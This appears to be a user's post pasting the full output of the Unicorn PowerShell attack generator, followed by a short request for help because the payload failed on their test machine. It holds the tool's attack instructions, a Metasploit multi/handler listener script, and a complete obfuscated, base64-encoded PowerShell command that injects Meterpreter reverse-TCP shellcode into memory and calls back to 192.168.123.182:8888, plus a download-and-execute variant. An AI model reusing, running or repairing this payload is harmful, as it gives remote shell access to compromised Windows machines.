python unicorn.py windows/x64/meterpreter/reverse_tcp 192.168.123.182 8888
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @trustedsec, @HackingDave
Happy Magic Unicorns.
[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
[!] Total Payload Length Size: 8420
Press {return} to continue.
[********************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[] Exported powershell output code to powershell_attack.txt.
[] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
union.rc file
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.123.182
set LPORT 8888
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j
powershell_attack.txt file
powershell /w 1 /C "s''v jR -;s''v us e''c;s''v fB ((g''v jR).value.toString()+(g''v us).value.toString());powershell (g''v fB).value.toString() ('JABrAHkAPQAnACQAZwB3AD0AJwAnAFsAWABqAFgAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAdABTAE0AKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBYAGoAWAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIAB2AG0AcAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsAWABqAFgAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABnAFUAeQApADsAWwBYAGoAWAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgB2AG0AcAAiACwAIAAiAEMAcgBlAGEAdABlAFQAIgArACIAaAAiACsAIgByAGUAYQBkACIAKQA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgB0AFMATQAiACwAIAAiAGMAYQAiACsAIgBsACIAKwAiAGwAbwBjACIAKQA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgBYAGoAWAAiACwAIAAiAEQAbABsAEkAbQBwAG8AcgAiACsAIgB0ACIAKwAiACIAKQA7ACQASABRAD0AIgB9AGYAYwAsAH0ANAA4ACwAfQA4ADMALAB9AGUANAAsAH0AZgAwACwAfQBlADgALAB9AGMAYwAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANAAxACwAfQA1ADEALAB9ADQAMQAsAH0ANQAwACwAfQA1ADIALAB9ADUAMQAsAH0ANQA2ACwAfQA0ADgALAB9ADMAMQAsAH0AZAAyACwAfQA2ADUALAB9ADQAOAAsAH0AOABiACwAfQA1ADIALAB9ADYAMAAsAH0ANAA4ACwAfQA4AGIALAB9ADUAMgAsAH0AMQA4ACwAfQA0ADgALAB9ADgAYgAsAH0ANQAyACwAfQAyADAALAB9ADQAOAAsAH0AOABiACwAfQA3ADIALAB9ADUAMAAsAH0ANAA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQA0AGEALAB9ADQAZAAsAH0AMwAxACwAfQBjADkALAB9ADQAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0ANAAxACwAfQBjADEALAB9AGMAOQAsAH0AMABkACwAfQA0ADEALAB9ADAAMQAsAH0AYwAxACwAfQBlADIALAB9AGUAZAAsAH0ANQAyACwAfQA0ADEALAB9ADUAMQAsAH0ANAA4ACwAfQA4AGIALAB9ADUAMgAsAH0AMgAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQA0ADgALAB9ADAAMQAsAH0AZAAwACwAfQA2ADYALAB9ADgAMQAsAH0ANwA4ACwAfQAxADgALAB9ADAAYgAsAH0AMAAyACwAfQAwAGYALAB9ADgANQAsAH0ANwAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA4AGIALAB9ADgAMAAsAH0AOAA4ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0ADgALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADYANwAsAH0ANAA4ACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAyADAALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9AGUAMwAsAH0ANQA2ACwAfQA0ADgALAB9AGYAZgAsAH0AYwA5ACwAfQA0ADEALAB9ADgAYgAsAH0AMwA0ACwAfQA4ADgALAB9ADQAOAAsAH0AMAAxACwAfQBkADYALAB9ADQAZAAsAH0AMwAxACwAfQBjADkALAB9ADQAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0ANAAxACwAfQBjADEALAB9AGMAOQAsAH0AMABkACwAfQA0ADEALAB9ADAAMQAsAH0AYwAxACwAfQAzADgALAB9AGUAMAAsAH0ANwA1ACwAfQBmADEALAB9ADQAYwAsAH0AMAAzACwAfQA0AGMALAB9ADIANAAsAH0AMAA4ACwAfQA0ADUALAB9ADMAOQAsAH0AZAAxACwAfQA3ADUALAB9AGQAOAAsAH0ANQA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAyADQALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9ADYANgAsAH0ANAAxACwAfQA4AGIALAB9ADAAYwAsAH0ANAA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAxAGMALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9ADQAMQAsAH0AOABiACwAfQAwADQALAB9ADgAOAAsAH0ANAA4ACwAfQAwADEALAB9AGQAMAAsAH0ANAAxACwAfQA1ADgALAB9ADQAMQAsAH0ANQA4ACwAfQA1AGUALAB9ADUAOQAsAH0ANQBhACwAfQA0ADEALAB9ADUAOAAsAH0ANAAxACwAfQA1ADkALAB9ADQAMQAsAH0ANQBhACwAfQA0ADgALAB9ADgAMwAsAH0AZQBjACwAfQAyADAALAB9ADQAMQAsAH0ANQAyACwAfQBmAGYALAB9AGUAMAAsAH0ANQA4ACwAfQA0ADEALAB9ADUAOQAsAH0ANQBhACwAfQA0ADgALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADQAYgAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA0ADkALAB9AGIAZQAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADQAMQAsAH0ANQA2ACwAf'+'QA0ADkALAB9ADgAOQAsAH0AZQA2ACwAfQA0ADgALAB9ADgAMQAsAH0AZQBjACwAfQBhADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADQAOQAsAH0AOAA5ACwAfQBlADUALAB9ADQAOQAsAH0AYgBjACwAfQAwADIALAB9ADAAMAAsAH0AMgAyACwAfQBiADgALAB9ADgAYgAsAH0AOQBiACwAfQA3ADYALAB9AGYANwAsAH0ANAAxACwAfQA1ADQALAB9ADQAOQAsAH0AOAA5ACwAfQBlADQALAB9ADQAYwAsAH0AOAA5ACwAfQBmADEALAB9ADQAMQAsAH0AYgBhACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGMALAB9ADgAOQAsAH0AZQBhACwAfQA2ADgALAB9ADAAMQAsAH0AMAAxACwAfQAwADAALAB9ADAAMAAsAH0ANQA5ACwAfQA0ADEALAB9AGIAYQAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADQAMQAsAH0ANQBlACwAfQA1ADAALAB9ADUAMAAsAH0ANABkACwAfQAzADEALAB9AGMAOQAsAH0ANABkACwAfQAzADEALAB9AGMAMAAsAH0ANAA4ACwAfQBmAGYALAB9AGMAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMgAsAH0ANAA4ACwAfQBmAGYALAB9AGMAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMQAsAH0ANAAxACwAfQBiAGEALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAOAAsAH0AOAA5ACwAfQBjADcALAB9ADYAYQAsAH0AMQAwACwAfQA0ADEALAB9ADUAOAAsAH0ANABjACwAfQA4ADkALAB9AGUAMgAsAH0ANAA4ACwAfQA4ADkALAB9AGYAOQAsAH0ANAAxACwAfQBiAGEALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0ANAA5ACwAfQBmAGYALAB9AGMAZQAsAH0ANwA1ACwAfQBlADUALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANAA4ACwAfQA4ADMALAB9AGUAYwAsAH0AMQAwACwAfQA0ADgALAB9ADgAOQAsAH0AZQAyACwAfQA0AGQALAB9ADMAMQAsAH0AYwA5ACwAfQA2AGEALAB9ADAANAAsAH0ANAAxACwAfQA1ADgALAB9ADQAOAAsAH0AOAA5ACwAfQBmADkALAB9ADQAMQAsAH0AYgBhACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA0ADgALAB9ADgAMwAsAH0AYwA0ACwAfQAyADAALAB9ADUAZQAsAH0AOAA5ACwAfQBmADYALAB9ADYAYQAsAH0ANAAwACwAfQA0ADEALAB9ADUAOQAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADQAMQAsAH0ANQA4ACwAfQA0ADgALAB9ADgAOQAsAH0AZgAyACwAfQA0ADgALAB9ADMAMQAsAH0AYwA5ACwAfQA0ADEALAB9AGIAYQAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMwAsAH0ANAA5ACwAfQA4ADkALAB9AGMANwAsAH0ANABkACwAfQAzADEALAB9AGMAOQAsAH0ANAA5ACwAfQA4ADkALAB9AGYAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGQAYQAsAH0ANAA4ACwAfQA4ADkALAB9AGYAOQAsAH0ANAAxACwAfQBiAGEALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADQAOAAsAH0AMAAxACwAfQBjADMALAB9ADQAOAAsAH0AMgA5ACwAfQBjADYALAB9ADQAOAAsAH0AOAA1ACwAfQBmADYALAB9ADcANQAsAH0AZQAxACwAfQA0ADEALAB9AGYAZgAsAH0AZQA3ACIAOwAkAEIAbQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAZwB3ACAALQBOAGEAbQBlACAAIgBFAFQAIgAgAC0AbgBhAG0AZQBzACAAVQBxAE0AOwAkAEIAbQA9ACQAQgBtAC4AcgBlAHAAbABhAGMAZQAoACIAVQBxAE0AIgAsACAAIgBXACIAKwAiAGkAIgArACIAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQASABRACAAPQAgACQASABRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBQAEgAegBMAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAUABIAHoATAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAVgBvAD0AMAB4ADEAMAAxADAAOwBpAGYAIAAoACQASABRAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAxADAAKQB7ACQAVgBvAD0AJABIAFEALgBMAH0AOwAkAG4AdQA9ACQAQgBtADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMQAwACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABnAFUAeQAgAD0AIAAwADsAZgBvAHIAKAAkAFcAUQA9ADAAOwAkAFcAUQAgAC0AbABlACgAJABIAFEALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAVwBRACsAKwApAHsAJABCAG0AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABuAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBRACkALAAgACQASABRAFsAJABXAFEAXQAsACAAMQApAH0AOwAkAEIAbQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABuAHUALAAgADAAeAAxADAAMQAwACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABnAFUAeQApADsAJABCAG0AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAAeAAwADAALAAkAG4AdQAsADAALAAwACwAMAApADsAJwA7ACQAYQBVAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABrAHkAKQApADsAJABHAEkAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAQwB3AD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGoAZQBTACAAPQAgACIAQwA6AFwAJABDAHcAXABzAHkAcwB3AG8AdwA2ADQAXAAkAEMAdwAkAEcASQBcAHYAMQAuADAAXAAkAEcASQAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcASQA9ACAAJABqAGUAUwB9ADsAJABpAGMAIAA9ACAAIgAgACQARwBJACAALQBuAG8AZQB4AGkAdAAgAC0AZQAgACQAYQBVACIAOwBpAGUAeAAgACQAaQBjAA'+'==')"
i change the byte into the magic ,but nothing happend in my vlun machine
can you tell me how you generate your payload
thanks